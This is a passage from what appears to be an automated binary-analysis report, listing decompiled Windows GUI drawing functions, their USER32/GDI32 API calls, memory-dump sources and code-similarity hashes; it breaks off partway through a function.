0x004251b9
0x004251ba
0x004251ba
0x004251c1
0x004251c2
0x004251c7
0x004251ca
0x004251cd
0x004251cf
0x004251d2
0x004251d6
0x004251d7
0x004251d9
0x004251da
0x004251dd
0x004251de
0x004251e3
0x004251ea
0x004251f3
0x004251fc
0x004251f5
0x004251f5
0x004251f5
0x004251f3
0x00425203
0x00425206
0x00425209
0x00425212
0x00425214
0x00425219
0x0042521d
0x0042521e
0x0042521e
0x00425236
0x00425236

APIs

72E7AC50.USER32(00000000,?,00000000,004253AD,?,?), ref: 004250FA
72E7A590.GDI32(00000001,00000000,00425263,?,00000000,004252FB,?,00000000,?,00000000,004253AD,?,?), ref: 0042515F
72E7A520.GDI32(00000001,00000001,00000001,00000001,00000000,00425263,?,00000000,004252FB,?,00000000,?,00000000,004253AD,?,?), ref: 00425174
SelectObject.GDI32(?,00000000), ref: 0042517E
72E7B410.GDI32(?,?,00000000,?,00000000,00000001,00000001,00000001,00000001,00000000,00425263,?,00000000,004252FB,?,00000000), ref: 004251AE
72E7B150.GDI32(?,?,?,00000000,?,00000000,00000001,00000001,00000001,00000001,00000000,00425263,?,00000000,004252FB), ref: 004251BA
72E7A7F0.GDI32(?,?,00000004,00000000,?,00000000,00000000,00425237,?,?,00000000,00000001,00000001,00000001,00000001,00000000), ref: 004251DE
GetLastError.KERNEL32(?,?,00000004,00000000,?,00000000,00000000,00425237,?,?,00000000,00000001,00000001,00000001,00000001,00000000), ref: 004251EC
72E7B410.GDI32(?,00000000,000000FF,0042523E,00000000,?,00000000,00000000,00425237,?,?,00000000,00000001,00000001,00000001,00000001), ref: 0042521E
SelectObject.GDI32(?,?), ref: 0042522B
DeleteObject.GDI32(00000000), ref: 00425231

Strings

BM, xrefs: 00424FB4
,#A, xrefs: 00424F8F
(, xrefs: 00425049

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Object$B410Select$A520A590B150DeleteErrorLast
String ID: ($,#A$BM
API String ID: 3415089252-1417865810
Opcode ID: 5a9aa16d97d8b47d9dd4312df1e32f25e663ee293d7b64bdf73fe92d951baa9f
Instruction ID: a0086a3a9348105b291f8282c459510307930b83bd3d865a48499880c105f012
Opcode Fuzzy Hash: 5a9aa16d97d8b47d9dd4312df1e32f25e663ee293d7b64bdf73fe92d951baa9f
Instruction Fuzzy Hash: C8D14B70B002189FDF04DFA9D885AAEBBF5FF49304F51846AE905EB391D7789840CB68

Uniqueness

Uniqueness Score: -1.00%

Function 004749C4, Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 174
windowCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E004749C4(int __eax, void* __eflags) {
				int _v8;
				char* _t87;
				int _t89;
				long _t92;
				int _t117;
				struct HWND__* _t146;
				void* _t149;
				void* _t150;
				struct HWND__* _t151;
				intOrPtr _t162;
				struct HWND__* _t168;
				void* _t170;
				struct HWND__* _t171;
				struct HWND__* _t172;
				intOrPtr _t174;
				intOrPtr _t176;

				_t174 = _t176;
				_v8 = __eax;
				E0042C188(_v8);
				_t146 = GetWindow(E0043C1F4(_v8), 5);
				 *(_v8 + 0x248) = _t146;
				_t168 = _t146;
				 *(_v8 + 0x268) = _t168;
				 *((intOrPtr*)(_v8 + 0x26c)) = GetWindowLongA(_t168, 0xfffffffc);
				SetWindowLongA( *(_v8 + 0x268), 0xfffffffc,  *(_v8 + 0x270));
				if( *((intOrPtr*)(_v8 + 0x281)) - 2 < 0) {
					_t151 = GetWindow(GetWindow(E0043C1F4(_v8), 5), 5);
					if(_t151 != 0) {
						if( *((char*)(_v8 + 0x281)) == 1) {
							_t172 = _t151;
							 *(_v8 + 0x244) = _t172;
							 *((intOrPtr*)(_v8 + 0x258)) = GetWindowLongA(_t172, 0xfffffffc);
							SetWindowLongA( *(_v8 + 0x244), 0xfffffffc,  *(_v8 + 0x254));
							_t151 = GetWindow(_t151, 2);
						}
						_t171 = _t151;
						 *(_v8 + 0x240) = _t171;
						 *((intOrPtr*)(_v8 + 0x250)) = GetWindowLongA(_t171, 0xfffffffc);
						SetWindowLongA( *(_v8 + 0x240), 0xfffffffc,  *(_v8 + 0x24c));
					}
				}
				_t87 =  *0x491050; // 0x492b70
				if( *_t87 != 0 &&  *(_v8 + 0x240) != 0) {
					SendMessageA( *(_v8 + 0x240), 0xd3, 3, 0);
				}
				if( *((intOrPtr*)(_v8 + 0x27c)) == 0) {
					_t89 = _v8;
					if( *((intOrPtr*)(_t89 + 0x278)) != 0) {
						_t92 = E00442A04( *((intOrPtr*)(_v8 + 0x278)));
						_t89 = PostMessageA(E0043C1F4(_v8), 0x402, 0, _t92);
					}
					return _t89;
				} else {
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x284)))) + 0x20))();
					 *((char*)(_v8 + 0x280)) = 1;
					 *[fs:eax] = _t176;
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x284)))) + 8))( *[fs:eax], 0x474bc6, _t174);
					_t149 = E004151B8( *((intOrPtr*)(_v8 + 0x284))) - 1;
					if(_t149 >= 0) {
						_t150 = _t149 + 1;
						_t170 = 0;
						do {
							 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x284)))) + 0x2c))();
							_t170 = _t170 + 1;
							_t150 = _t150 - 1;
						} while (_t150 != 0);
					}
					E0040BAD8(_v8 + 0x27c);
					E00435C68(_v8);
					_pop(_t162);
					 *[fs:eax] = _t162;
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x284)))) + 0x24))(0x474bcd);
					_t117 = _v8;
					 *((char*)(_t117 + 0x280)) = 0;
					return _t117;
				}
			}

0x004749c5
0x004749ca
0x004749d0
0x004749e5
0x004749ea
0x004749f0
0x004749f5
0x00474a06
0x00474a22
0x00474a32
0x00474a50
0x00474a54
0x00474a64
0x00474a69
0x00474a6b
0x00474a7c
0x00474a98
0x00474aa5
0x00474aa5
0x00474aaa
0x00474aac
0x00474abd
0x00474ad9
0x00474ad9
0x00474a54
0x00474ade
0x00474ae6
0x00474b07
0x00474b07
0x00474b16
0x00474bcd
0x00474bd7
0x00474be2
0x00474bf8
0x00474bf8
0x00474c01
0x00474b1c
0x00474b27
0x00474b2d
0x00474b3f
0x00474b56
0x00474b69
0x00474b6c
0x00474b6e
0x00474b6f
0x00474b71
0x00474b7e
0x00474b81
0x00474b82
0x00474b82
0x00474b71
0x00474b8d
0x00474b9b
0x00474ba2
0x00474ba5
0x00474bb8
0x00474bbb
0x00474bbe
0x00474bc5
0x00474bc5

APIs

Part of subcall function 0042C188: SendMessageA.USER32 ref: 0042C1A8

GetWindow.USER32(00000000,00000005), ref: 004749E0
GetWindowLongA.USER32 ref: 004749FE
SetWindowLongA.USER32 ref: 00474A22
GetWindow.USER32(00000000,00000005), ref: 00474A45
GetWindow.USER32(00000000,00000000), ref: 00474A4B
GetWindowLongA.USER32 ref: 00474A74
SetWindowLongA.USER32 ref: 00474A98
GetWindow.USER32(00000000,00000002), ref: 00474AA0
GetWindowLongA.USER32 ref: 00474AB5
SetWindowLongA.USER32 ref: 00474AD9
SendMessageA.USER32 ref: 00474B07

Strings

p+I, xrefs: 00474ADE

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Long$MessageSend
String ID: p+I
API String ID: 1593136606-3535844639
Opcode ID: 2b1c59f87e6d7c0c28170d5b3a0ee90902b3f0ceb1caab95805b7b657a5b4690
Instruction ID: 8fdb1834a48dc50901c4802ba14f808ad23408d3c31b557c86e1ba50301c72a9
Opcode Fuzzy Hash: 2b1c59f87e6d7c0c28170d5b3a0ee90902b3f0ceb1caab95805b7b657a5b4690
Instruction Fuzzy Hash: 0F61E974A04105EFDB10DB99C989FA977F4EB49314F2542E5F418AB3A2CB74AE00DB58

Uniqueness

Uniqueness Score: -1.00%

Function 00424598, Relevance: 21.2, APIs: 14, Instructions: 217
windowCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E00424598(intOrPtr* __eax, void* __ebx, signed int __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				void* _v12;
				char _v13;
				struct tagPOINT _v21;
				struct HDC__* _v28;
				void* _v32;
				intOrPtr _t74;
				struct HDC__* _t76;
				signed int _t78;
				signed int _t79;
				char _t80;
				void* _t87;
				struct HDC__* _t110;
				void* _t131;
				struct HDC__* _t155;
				intOrPtr* _t159;
				intOrPtr _t167;
				signed int _t168;
				intOrPtr _t171;
				intOrPtr _t173;
				intOrPtr _t175;
				int* _t179;
				intOrPtr _t181;
				void* _t183;
				void* _t184;
				intOrPtr _t185;

				_t160 = __ecx;
				_t183 = _t184;
				_t185 = _t184 + 0xffffffe4;
				_t179 = __ecx;
				_v8 = __edx;
				_t159 = __eax;
				_t181 =  *((intOrPtr*)(__eax + 0x28));
				_t167 =  *0x4247e4; // 0xf
				E004207D8(_v8, __ecx, _t167);
				E00424C08(_t159);
				_v12 = 0;
				_v13 = 0;
				_t74 =  *((intOrPtr*)(_t181 + 0x10));
				if(_t74 != 0) {
					_push(0xffffffff);
					_push(_t74);
					_t155 =  *(_v8 + 4);
					_push(_t155);
					L00406C64();
					_v12 = _t155;
					_push( *(_v8 + 4));
					L00406C34();
					_v13 = 1;
				}
				_push(0xc);
				_t76 =  *(_v8 + 4);
				_push(_t76);
				L00406B8C();
				_push(_t76);
				_push(0xe);
				_t78 =  *(_v8 + 4);
				L00406B8C();
				_t168 = _t78;
				_t79 = _t168 * _t78;
				if(_t79 > 8) {
					L4:
					_t80 = 0;
				} else {
					_t160 =  *(_t181 + 0x28) & 0x0000ffff;
					if(_t79 < ( *(_t181 + 0x2a) & 0x0000ffff) * ( *(_t181 + 0x28) & 0x0000ffff)) {
						_t80 = 1;
					} else {
						goto L4;
					}
				}
				if(_t80 == 0) {
					if(E00424924(_t159) == 0) {
						SetStretchBltMode(E00420704(_v8), 3);
					}
				} else {
					GetBrushOrgEx( *(_v8 + 4),  &_v21);
					SetStretchBltMode( *(_v8 + 4), 4);
					SetBrushOrgEx( *(_v8 + 4), _v21, _v21.y,  &_v21);
				}
				_push(_t183);
				_push(0x4247d5);
				_push( *[fs:eax]);
				 *[fs:eax] = _t185;
				if( *((intOrPtr*)( *_t159 + 0x28))() != 0) {
					E00424BA8(_t159, _t160);
				}
				_t87 = E00424868(_t159);
				_t171 =  *0x4247e4; // 0xf
				E004207D8(_t87, _t160, _t171);
				if( *((intOrPtr*)( *_t159 + 0x28))() == 0) {
					StretchBlt( *(_v8 + 4),  *_t179, _t179[1], _t179[2] -  *_t179, _t179[3] - _t179[1],  *(E00424868(_t159) + 4), 0, 0,  *(_t181 + 0x1c),  *(_t181 + 0x20),  *(_v8 + 0x20));
					_pop(_t173);
					 *[fs:eax] = _t173;
					_push(E004247DC);
					if(_v13 != 0) {
						_push(0xffffffff);
						_push(_v12);
						_t110 =  *(_v8 + 4);
						_push(_t110);
						L00406C64();
						return _t110;
					}
					return 0;
				} else {
					_v32 = 0;
					_v28 = 0;
					_push(_t183);
					_push(0x42476a);
					_push( *[fs:eax]);
					 *[fs:eax] = _t185;
					L00406AE4();
					_v28 = E00420AFC(0);
					_v32 = SelectObject(_v28,  *(_t181 + 0xc));
					E00420CA0( *(_v8 + 4), _t159, _t179[1],  *_t179, _t179, _t181, 0, 0, _v28,  *(_t181 + 0x20),  *(_t181 + 0x1c), 0, 0,  *(E00424868(_t159) + 4), _t179[3] - _t179[1], _t179[2] -  *_t179);
					_t131 = 0;
					_t175 = 0;
					 *[fs:eax] = _t175;
					_push(0x4247af);
					if(_v32 != 0) {
						_t131 = SelectObject(_v28, _v32);
					}
					if(_v28 != 0) {
						return DeleteDC(_v28);
					}
					return _t131;
				}
			}

0x00424598
0x00424599
0x0042459b
0x004245a1
0x004245a3
0x004245a6
0x004245a8
0x004245ab
0x004245b4
0x004245bb
0x004245c2
0x004245c5
0x004245c9
0x004245ce
0x004245d0
0x004245d2
0x004245d6
0x004245d9
0x004245da
0x004245df
0x004245e8
0x004245e9
0x004245ee
0x004245ee
0x004245f2
0x004245f7
0x004245fa
0x004245fb
0x00424600
0x00424601
0x00424606
0x0042460a
0x0042460f
0x00424613
0x00424618
0x00424629
0x00424629
0x0042461a
0x0042461e
0x00424627
0x0042462d
0x00000000
0x00000000
0x00000000
0x00424627
0x00424631
0x00424674
0x00424681
0x00424681
0x00424633
0x0042463e
0x0042464c
0x00424664
0x00424664
0x00424688
0x00424689
0x0042468e
0x00424691
0x0042469d
0x004246a1
0x004246a1
0x004246a8
0x004246ad
0x004246b3
0x004246c1
0x004247aa
0x004247b1
0x004247b4
0x004247b7
0x004247c0
0x004247c2
0x004247c7
0x004247cb
0x004247ce
0x004247cf
0x00000000
0x004247cf
0x004247d4
0x004246c7
0x004246c9
0x004246ce
0x004246d3
0x004246d4
0x004246d9
0x004246dc
0x004246e1
0x004246eb
0x004246fb
0x00424735
0x0042473a
0x0042473c
0x0042473f
0x00424742
0x0042474b
0x00424755
0x00424755
0x0042475e
0x00000000
0x00424764
0x00424769
0x00424769

APIs

Part of subcall function 00424C08: 72E7AC50.USER32(00000000,?,?,?,?,0042375F,00000000,004237EB), ref: 00424C5E
Part of subcall function 00424C08: 72E7AD70.GDI32(00000000,0000000C,00000000,?,?,?,?,0042375F,00000000,004237EB), ref: 00424C73
Part of subcall function 00424C08: 72E7AD70.GDI32(00000000,0000000E,00000000,0000000C,00000000,?,?,?,?,0042375F,00000000,004237EB), ref: 00424C7D
Part of subcall function 00424C08: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,0042375F,00000000,004237EB), ref: 00424CA1
Part of subcall function 00424C08: 72E7B380.USER32(00000000,00000000,00000000,?,?,?,?,0042375F,00000000,004237EB), ref: 00424CAC

72E7B410.GDI32(?,?,000000FF), ref: 004245DA
72E7B150.GDI32(?,?,?,000000FF), ref: 004245E9
72E7AD70.GDI32(?,0000000C), ref: 004245FB
72E7AD70.GDI32(?,0000000E,00000000,?,0000000C), ref: 0042460A
GetBrushOrgEx.GDI32(?,?,0000000E,00000000,?,0000000C), ref: 0042463E
SetStretchBltMode.GDI32(?,00000004), ref: 0042464C
SetBrushOrgEx.GDI32(?,?,?,?,?,00000004,?,?,0000000E,00000000,?,0000000C), ref: 00424664
SetStretchBltMode.GDI32(00000000,00000003), ref: 00424681
72E7A590.GDI32(00000000,00000000,0042476A,?,?,0000000E,00000000,?,0000000C), ref: 004246E1
SelectObject.GDI32(?,?), ref: 004246F6
SelectObject.GDI32(?,00000000), ref: 00424755
DeleteDC.GDI32(00000000), ref: 00424764

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: BrushModeObjectSelectStretch$A590B150B380B410CreateDeleteHalftonePalette
String ID:
API String ID: 2051775979-0
Opcode ID: fe7d686b3323d8b8b154543582734b889aafd599eed5243266c7d830b2acc61e
Instruction ID: d8dca1dc3148269436b121e867a8f998dbdffe145855f72674f5f49c2dbe5de2
Opcode Fuzzy Hash: fe7d686b3323d8b8b154543582734b889aafd599eed5243266c7d830b2acc61e
Instruction Fuzzy Hash: EE718AB5B00215AFCB40EFA9C985F5EB7F8EB89304F51856AB508E7281C738ED00CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00420B0C, Relevance: 21.1, APIs: 14, Instructions: 131
windowCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E00420B0C(struct HDC__* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
				void* _v8;
				int _v12;
				int _v16;
				void* _v20;
				int _v24;
				struct HDC__* _v28;
				struct HDC__* _v32;
				int _v48;
				int _v52;
				void _v56;
				int _t37;
				void* _t41;
				int _t43;
				void* _t47;
				void* _t72;
				intOrPtr _t79;
				intOrPtr _t80;
				void* _t85;
				void* _t87;
				void* _t88;
				intOrPtr _t89;

				_t87 = _t88;
				_t89 = _t88 + 0xffffffcc;
				asm("movsd");
				asm("movsd");
				_t71 = __ecx;
				_v8 = __eax;
				_push(0);
				L00406AE4();
				_v28 = __eax;
				_push(0);
				L00406AE4();
				_v32 = __eax;
				_push(_t87);
				_push(0x420c5a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t89;
				_t37 = GetObjectA(_v8, 0x18,  &_v56);
				if(__ecx == 0) {
					_push(0);
					L00406EA4();
					_v24 = _t37;
					if(_v24 == 0) {
						E00420A54(__ecx);
					}
					_push(_t87);
					_push(0x420bc9);
					_push( *[fs:eax]);
					 *[fs:eax] = _t89;
					_push(_v12);
					_push(_v16);
					_t41 = _v24;
					_push(_t41);
					L00406ADC();
					_v20 = _t41;
					if(_v20 == 0) {
						E00420A54(_t71);
					}
					_pop(_t79);
					 *[fs:eax] = _t79;
					_push(0x420bd0);
					_t43 = _v24;
					_push(_t43);
					_push(0);
					L00407114();
					return _t43;
				} else {
					_push(0);
					_push(1);
					_push(1);
					_push(_v12);
					_t47 = _v16;
					_push(_t47);
					L00406ACC();
					_v20 = _t47;
					if(_v20 != 0) {
						_t72 = SelectObject(_v28, _v8);
						_t85 = SelectObject(_v32, _v20);
						StretchBlt(_v32, 0, 0, _v16, _v12, _v28, 0, 0, _v52, _v48, 0xcc0020);
						if(_t72 != 0) {
							SelectObject(_v28, _t72);
						}
						if(_t85 != 0) {
							SelectObject(_v32, _t85);
						}
					}
					_pop(_t80);
					 *[fs:eax] = _t80;
					_push(E00420C61);
					DeleteDC(_v28);
					return DeleteDC(_v32);
				}
			}

0x00420b0d
0x00420b0f
0x00420b1a
0x00420b1b
0x00420b1c
0x00420b1e
0x00420b21
0x00420b23
0x00420b28
0x00420b2b
0x00420b2d
0x00420b32
0x00420b37
0x00420b38
0x00420b3d
0x00420b40
0x00420b4d
0x00420b54
0x00420b6e
0x00420b70
0x00420b75
0x00420b7c
0x00420b7e
0x00420b7e
0x00420b85
0x00420b86
0x00420b8b
0x00420b8e
0x00420b94
0x00420b98
0x00420b99
0x00420b9c
0x00420b9d
0x00420ba2
0x00420ba9
0x00420bab
0x00420bab
0x00420bb2
0x00420bb5
0x00420bb8
0x00420bbd
0x00420bc0
0x00420bc1
0x00420bc3
0x00420bc8
0x00420b56
0x00420b56
0x00420b58
0x00420b5a
0x00420b5f
0x00420b60
0x00420b63
0x00420b64
0x00420b69
0x00420bd4
0x00420be3
0x00420bf2
0x00420c19
0x00420c20
0x00420c27
0x00420c27
0x00420c2e
0x00420c35
0x00420c35
0x00420c2e
0x00420c3c
0x00420c3f
0x00420c42
0x00420c4b
0x00420c59
0x00420c59

APIs

72E7A590.GDI32(00000000), ref: 00420B23
72E7A590.GDI32(00000000,00000000), ref: 00420B2D
GetObjectA.GDI32(?,00000018,?), ref: 00420B4D
72E7A410.GDI32(?,?,00000001,00000001,00000000,?,00000018,?,00000000,00420C5A,?,00000000,00000000), ref: 00420B64
72E7AC50.USER32(00000000,?,00000018,?,00000000,00420C5A,?,00000000,00000000), ref: 00420B70
72E7A520.GDI32(00000000,?,?,00000000,00420BC9,?,00000000,?,00000018,?,00000000,00420C5A,?,00000000,00000000), ref: 00420B9D
72E7B380.USER32(00000000,00000000,00420BD0,00000000,00420BC9,?,00000000,?,00000018,?,00000000,00420C5A,?,00000000,00000000), ref: 00420BC3
SelectObject.GDI32(?,?), ref: 00420BDE
SelectObject.GDI32(?,00000000), ref: 00420BED
StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,?,?,00CC0020), ref: 00420C19
SelectObject.GDI32(?,00000000), ref: 00420C27
SelectObject.GDI32(?,00000000), ref: 00420C35
DeleteDC.GDI32(?), ref: 00420C4B
DeleteDC.GDI32(?), ref: 00420C54

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Object$Select$A590Delete$A410A520B380Stretch
String ID:
API String ID: 956127455-0
Opcode ID: de28637c75b565a7a6afd24bb6ec7489613feed82cab3300559889407d70de75
Instruction ID: 1228fffddf30234240278f6c42dfef2ef2d340ebba79dd9114fbee5a630f2c20
Opcode Fuzzy Hash: de28637c75b565a7a6afd24bb6ec7489613feed82cab3300559889407d70de75
Instruction Fuzzy Hash: 11410DB1E04219AFDB10EBE5DC42FAFB7FCEB08704F514426B605F7281C679A9108B68

Uniqueness

Uniqueness Score: -1.00%

Function 0043D008, Relevance: 19.7, APIs: 13, Instructions: 213
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E0043D008(intOrPtr* __eax, intOrPtr __edx) {
				intOrPtr* _v8;
				intOrPtr _v12;
				struct HDC__* _v16;
				struct tagRECT _v32;
				struct tagRECT _v48;
				void* _v64;
				struct HDC__* _t115;
				void* _t166;
				intOrPtr* _t188;
				intOrPtr* _t191;
				void* _t200;
				intOrPtr _t207;
				signed int _t224;
				void* _t227;
				void* _t229;
				intOrPtr _t230;

				_t227 = _t229;
				_t230 = _t229 + 0xffffffc4;
				_v12 = __edx;
				_v8 = __eax;
				if( *(_v8 + 0x165) != 0 ||  *(_v8 + 0x16c) > 0) {
					_t115 = E0043C1F4(_v8);
					_push(_t115);
					L00406FB4();
					_v16 = _t115;
					_push(_t227);
					_push(0x43d26e);
					_push( *[fs:edx]);
					 *[fs:edx] = _t230;
					GetClientRect(E0043C1F4(_v8),  &_v32);
					GetWindowRect(E0043C1F4(_v8),  &_v48);
					MapWindowPoints(0, E0043C1F4(_v8),  &_v48, 2);
					OffsetRect( &_v32,  ~(_v48.left),  ~(_v48.top));
					ExcludeClipRect(_v16, _v32, _v32.top, _v32.right, _v32.bottom);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					InflateRect( &_v32,  *(_v8 + 0x16c),  *(_v8 + 0x16c));
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					if( *(_v8 + 0x165) != 0) {
						_t200 = 0;
						if( *(_v8 + 0x163) != 0) {
							_t200 = 0 +  *((intOrPtr*)(_v8 + 0x168));
						}
						if( *(_v8 + 0x164) != 0) {
							_t200 = _t200 +  *((intOrPtr*)(_v8 + 0x168));
						}
						_t224 = GetWindowLongA(E0043C1F4(_v8), 0xfffffff0);
						if(( *(_v8 + 0x162) & 0x00000001) != 0) {
							_v48.left = _v48.left - _t200;
						}
						if(( *(_v8 + 0x162) & 0x00000002) != 0) {
							_v48.top = _v48.top - _t200;
						}
						if(( *(_v8 + 0x162) & 0x00000004) != 0) {
							_v48.right = _v48.right + _t200;
						}
						if((_t224 & 0x00200000) != 0) {
							_t191 =  *0x490fe4; // 0x492a9c
							_v48.right = _v48.right +  *((intOrPtr*)( *_t191))(0x14);
						}
						if(( *(_v8 + 0x162) & 0x00000008) != 0) {
							_v48.bottom = _v48.bottom + _t200;
						}
						if((_t224 & 0x00100000) != 0) {
							_t188 =  *0x490fe4; // 0x492a9c
							_v48.bottom = _v48.bottom +  *((intOrPtr*)( *_t188))(0x15);
						}
						DrawEdge(_v16,  &_v48,  *(0x4769cc + ( *(_v8 + 0x163) & 0x000000ff) * 4) |  *(0x4769dc + ( *(_v8 + 0x164) & 0x000000ff) * 4),  *(_v8 + 0x162) & 0x000000ff |  *(0x4769ec + ( *(_v8 + 0x165) & 0x000000ff) * 4) |  *(0x4769fc + ( *(_v8 + 0x1a5) & 0x000000ff) * 4) | 0x00002000);
					}
					IntersectClipRect(_v16, _v48.left, _v48.top, _v48.right, _v48.bottom);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					OffsetRect( &_v48,  ~_v48,  ~(_v48.top));
					FillRect(_v16,  &_v48, E0041FC20( *((intOrPtr*)(_v8 + 0x170))));
					_pop(_t207);
					 *[fs:eax] = _t207;
					_push(0x43d275);
					_push(_v16);
					_t166 = E0043C1F4(_v8);
					_push(_t166);
					L00407114();
					return _t166;
				} else {
					return  *((intOrPtr*)( *_v8 - 0x10))();
				}
			}

0x0043d009
0x0043d00b
0x0043d011
0x0043d014
0x0043d021
0x0043d036
0x0043d03b
0x0043d03c
0x0043d041
0x0043d046
0x0043d047
0x0043d04c
0x0043d04f
0x0043d05f
0x0043d071
0x0043d087
0x0043d09c
0x0043d0b5
0x0043d0c0
0x0043d0c1
0x0043d0c2
0x0043d0c3
0x0043d0d3
0x0043d0de
0x0043d0df
0x0043d0e0
0x0043d0e1
0x0043d0ec
0x0043d0f2
0x0043d0fe
0x0043d103
0x0043d103
0x0043d113
0x0043d118
0x0043d118
0x0043d12e
0x0043d13a
0x0043d13c
0x0043d13c
0x0043d149
0x0043d14b
0x0043d14b
0x0043d158
0x0043d15a
0x0043d15a
0x0043d163
0x0043d167
0x0043d170
0x0043d170
0x0043d17d
0x0043d17f
0x0043d17f
0x0043d188
0x0043d18c
0x0043d195
0x0043d195
0x0043d1f5
0x0043d1f5
0x0043d20e
0x0043d219
0x0043d21a
0x0043d21b
0x0043d21c
0x0043d22d
0x0043d249
0x0043d250
0x0043d253
0x0043d256
0x0043d25e
0x0043d262
0x0043d267
0x0043d268
0x0043d26d
0x0043d275
0x0043d286
0x0043d286

APIs

72E7B080.USER32(00000000), ref: 0043D03C
GetClientRect.USER32 ref: 0043D05F
GetWindowRect.USER32 ref: 0043D071
MapWindowPoints.USER32 ref: 0043D087
OffsetRect.USER32(?,?,?), ref: 0043D09C
ExcludeClipRect.GDI32(?,?,?,?,?,?,?,?,00000000,00000000,?,00000002,00000000,?,00000000,?), ref: 0043D0B5
InflateRect.USER32(?,00000000,00000000), ref: 0043D0D3
GetWindowLongA.USER32 ref: 0043D129
DrawEdge.USER32(?,?,00000000,00000008), ref: 0043D1F5
IntersectClipRect.GDI32(?,?,?,?,?), ref: 0043D20E
OffsetRect.USER32(?,?,?), ref: 0043D22D
FillRect.USER32 ref: 0043D249
72E7B380.USER32(00000000,?,0043D275,?,?,?,?,?,?,?,?,?,00000000,00000000,?,?), ref: 0043D268

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Rect$Window$ClipOffset$B080B380ClientDrawEdgeExcludeFillInflateIntersectLongPoints
String ID:
API String ID: 156109915-0
Opcode ID: f2bb1449c155b818ac3dedcfc7b2c4e70bf694dc6016d051f9f4b8549ca3e0b7
Instruction ID: 1faef759c327ef8a802d1c5a586fb5fbf755e3f376881b730710df9886f4892a
Opcode Fuzzy Hash: f2bb1449c155b818ac3dedcfc7b2c4e70bf694dc6016d051f9f4b8549ca3e0b7
Instruction Fuzzy Hash: A5811571E04208AFCB01DBA8D885EEEB7F9AF09304F1541A6F518F7252C779AE04DB64

Uniqueness

Uniqueness Score: -1.00%

Function 0041FE5C, Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 224
windowCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E0041FE5C(intOrPtr* __eax, intOrPtr* __ecx, int* __edx, intOrPtr _a4, int* _a8) {
				intOrPtr* _v8;
				intOrPtr* _v12;
				int _v16;
				int _v20;
				int _v24;
				long _v28;
				long _v32;
				struct HDC__* _v36;
				intOrPtr* _v40;
				void* _v44;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t116;
				void* _t124;
